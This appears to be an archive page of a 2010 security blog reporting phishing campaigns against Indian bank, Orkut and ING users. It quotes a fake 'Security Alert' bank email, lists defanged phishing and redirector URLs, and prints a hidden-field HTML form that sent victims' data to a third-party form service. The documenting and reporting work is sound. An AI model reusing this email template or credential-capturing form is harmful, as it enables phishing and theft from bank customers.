Monday, July 26, 2010
Thursday, May 20, 2010
Phish With attachment
Here what we identified
Phishing mail with attached HTML but faked alike pdf file.which has following link inside
multiple level of redirection used.
But OPEN DNS saved with its blacklisting database.
Open DNS provides good level of protection from fake and malware sites.
Here is information on how to use this service
Monday, March 29, 2010
Bit.ly Targeted with bank Phishing
We have seen security features of bit.ly and its increased use as short url service , now it been exploited to send bank phishing emails
Here is the link
with following content
Security Alert:
Dear Valued Customer
Your Account has generated an error code on our Account Maintainance Server.
As an additional security measure, you are required to follow the security link below to
avoid such occurence in the future.
Please follow the link below to resolve this problem:
this link redirect to hacked site
hxxp://75.125.175.170/~makiasan/case/site.php
then redirects with 302 code to following link hosting the phishing pages.
hxxp://pasteups.com/Help/Common%20Wealth/icici/onlineverification.do/indexx.html
Thursday, January 21, 2010
Orkut Phishing ….
Here is an Orkut phishing victim
this leads to following page hosted to free web service
get the user information and redirects to orkut login page , but the information goes to following guy
Online Phishing by Exploiting
Most of this Phishing pages are hosted to hacked server and data are send to public domain like free email and other service.
Here is the mail that take us to the Phishing page
Here is a server hosting file on the server
this server is hacked as its using outdated software
with POC code
Friday, January 15, 2010
Phishing using Form Buddy !
Last Phishing page reported on Punjab National Bank uses the “Form Buddy” service to capture the information and redirect back to original Bank site.Here is the info found in the pages.
<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post">
<input type="hidden" name="username" value="tundehsbcxxxxxx">
<input type="hidden" name="reqd" value="0">
<input type="hidden" name="url" value="http://www.pnbindia.com">
its been reported to Form Buddy.
More Phishing ……….
We had couple of Phishing incident reported today here are they
hxxp://searchindiaonline.com/bank-india/ing/INGBanner.html – ING phishing
directs to
hxxp://netpnbsecuritysystem.t35.com/netpnb/ – PNB bank
site loaded by above link
Subscribe to:
Posts (Atom)
APK spam on Whatsapp Targeting Bank users
Initial vector: Whatsapp spam user posing as union bank with logo in user profile shared apk file named as “Union Bank Aadhaar Update....
-
Initial vector: Whatsapp spam user posing as union bank with logo in user profile shared apk file named as “Union Bank Aadhaar Update....
-
Here is the Posting to a google group this link redirects to hxxp://numberstencils.net/images/www/index.php above link connecte...
-
We have seen security features of bit.ly and its increased use as short url service , now it been exploited to send bank phishing emails ...
